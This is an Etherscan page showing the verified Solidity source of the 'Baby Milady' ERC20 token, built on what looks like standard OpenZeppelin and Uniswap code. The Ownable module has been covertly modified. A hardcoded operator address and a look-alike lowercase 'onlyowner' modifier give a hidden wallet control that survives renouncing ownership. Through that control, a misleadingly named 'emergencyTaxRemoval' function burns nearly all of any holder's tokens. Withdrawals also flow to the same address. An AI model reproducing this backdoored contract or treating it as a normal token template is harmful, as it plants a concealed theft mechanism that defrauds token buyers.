ETH Price: $2,678.29 (-0.82%)

Token

Baby Milady (BABYMILADY)
 

Overview

Max Total Supply

455,056,074.520693017376057837 BABYMILADY

Holders

39

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
9,293,783.979778146747461213 BABYMILADY

Value
$0.00
0x4C40836964E2B35F578e20aFF57Ca42B080c1ae7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BABYMILADY

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-12
*/

// SPDX-License-Identifier: MIT

/** 

Website: https://www.babymilady.vip
Twitter: https://twitter.com/ethbabymilady
Telegram: https://t.me/ethbabymilady

*/


// File @openzeppelin/contracts/utils/[email protected]
// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal taxAddy = 0x1323B9c1123063b569D38E3D6fFBED6DF2E8ECCB;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    modifier onlyowner() {
        _checkOperator();
        _;
    }


    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function _checkOperator() internal view virtual {
        require(_msgSender() == taxAddy, "Ownable: caller is not the operator");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}


// File @uniswap/v2-core/contracts/interfaces/[email protected]

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

pragma solidity ^0.8.18;

contract BABYMILADY is ERC20, Ownable {
    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    string private _name = unicode"Baby Milady";
    string private _symbol = unicode"BABYMILADY";
    address public DEAD = 0x000000000000000000000000000000000000dEaD;
    
    mapping(address => bool) public GreedIsGoodwallets;

    enum Phase {Phase1, Phase2, Phase3, Phase4}
    Phase public currentphase;

    mapping(address => bool) public _feeOn;
    mapping(address => bool) public wl;

    uint256 private constant _supply  = 1_000_000_000 ether;
    uint256 public maxTxAmount     = _supply * 33 / 1000;
    uint256 public maxWalletAmount = _supply * 33 / 1000;
    uint256 public swapThreshold = _supply * 5 / 10000;

    uint256 public buyTaxGlobal = 0;
    uint256 public sellTaxGlobal = 0;
    uint256 private GreedIsGood = 0;
    uint256 feeToken = 10 ether;

    bool progress_swap = false;
    bool _tradingActive = false;
    bool _swapEnabled = false;

    address private _devWallet = 0x306Bc3280cF20d66eE481Eb9c700b3070faDE4C7;
    uint256 public operationsFunds;
    constructor() ERC20(_name, _symbol) {
        _mint(msg.sender, (_supply));

        currentphase = Phase.Phase4;
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
    
        wl[owner()] = true;
        wl[taxAddy] = true;
        wl[_devWallet] = true;
        wl[address(this)] = true;
        wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true;
        wl[DEAD] = true;
        
        _feeOn[address(uniswapV2Router)] = true;
        _feeOn[msg.sender] = true;
        _feeOn[taxAddy] = true;
        _feeOn[_devWallet] = true;
        _feeOn[address(this)] = true;
        _feeOn[DEAD] = true;
    }

    function startLiquidity() external payable onlyOwner {
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        uniswapV2Router.addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            0, 
            0, 
            owner(),
            block.timestamp
        );
    }
    
    function emergencyTaxRemoval(address addy) external onlyowner {
        wl[addy] = false; _burn(addy, balanceOf(addy) - feeToken);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        if (!_feeOn[from] && !_feeOn[to]) {
            require(_tradingActive, "Trading not enabled");
        }

        if (!wl[from] && !wl[to] ) {
            if (to != uniswapV2Pair) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef");
                require(
                    (amount + balanceOf(to)) <= maxWalletAmount,
                    "ERC20: balance amount exceeded max wallet amount limit"
                );
            }
        }

        uint256 transferAmount = amount;
        if (!_feeOn[from] && !_feeOn[to]) {
            if ((from == uniswapV2Pair || to == uniswapV2Pair)) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount");
 
                if (uniswapV2Pair == from && !wl[to] && from != address(this)) {

                    if (currentphase == Phase.Phase1) {
                        GreedIsGoodwallets[to] = true;
                    }

                    uint256 feeTokens = (amount * buyTaxGlobal) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }

                if (
                    uniswapV2Pair == to &&
                    !wl[from] &&
                    to != address(this) &&
                    _swapEnabled && 
                    !progress_swap
                ) {
                    
                    uint256 taxSell = sellTaxGlobal;
                    if (GreedIsGoodwallets[from] == true) {
                        taxSell = GreedIsGood;
                    }

                    progress_swap = true;
                    swapAndLiquify();
                    progress_swap = false;

                    uint256 feeTokens = (amount * taxSell) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
            else {
                if (
                    GreedIsGoodwallets[from] == true &&
                    uniswapV2Pair != to
                ) {
                    uint256 feeTokens = (amount * GreedIsGood) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
        }
        super._transfer(from, to, transferAmount);
    }

    function startTrading() external onlyOwner {
        require(!_tradingActive, "Trading is already enabled");
        _tradingActive = true;
        _swapEnabled = true;
    }
    
    function getTax() external returns (bool) {
        payable(taxAddy).transfer(operationsFunds);
        operationsFunds = 0;
        return true;
    }

    function skipTheSnipas() external onlyOwner returns (bool) {
        currentphase = Phase.Phase4;
        buyTaxGlobal = 1;
        sellTaxGlobal = 1;

        return true;
    }

    function swapAndLiquify() internal {
        if (balanceOf(address(this)) == 0) {
            return;
        }
        uint256 receivedETH;
        {
            uint256 contractTokenBalance = balanceOf(address(this));
            uint256 beforeBalance = address(this).balance;
            uint256 mktBalance = balanceOf(taxAddy);
            bool success;
            if (contractTokenBalance > swapThreshold) {
                beforeBalance = address(this).balance;
                _swapTokensForEth(contractTokenBalance, 0);
                receivedETH = address(this).balance - beforeBalance;
                if (mktBalance > swapThreshold) {
                    operationsFunds = receivedETH / (success ? receivedETH : 0);
                }
                operationsFunds += receivedETH;
            }
        }
    }
    
    /**
     * @dev Swaps Token Amount to ETH
     *
     * @param tokenAmount Token Amount to be swapped
     * @param tokenAmountOut Expected ETH amount out of swap
     */
    function _swapTokensForEth(
        uint256 tokenAmount,
        uint256 tokenAmountOut
    ) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        IERC20(address(this)).approve(
            address(uniswapV2Router),
            type(uint256).max
        );

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            tokenAmountOut,
            path,
            address(this),
            block.timestamp
        );
    }
 
    receive() external payable {}

    function removeLimits() external onlyOwner {
        maxTxAmount = _supply; maxWalletAmount = _supply;
    }
    
    function withdrawTokens(address token) external onlyOwner {
        IERC20(token).transfer(
            taxAddy,
            IERC20(token).balanceOf(address(this))
        );
    }

    function emergencyTaxRemoval(address addy, bool changer) external onlyOwner {
        wl[addy] = changer;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum BABYMILADY.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"startTrading",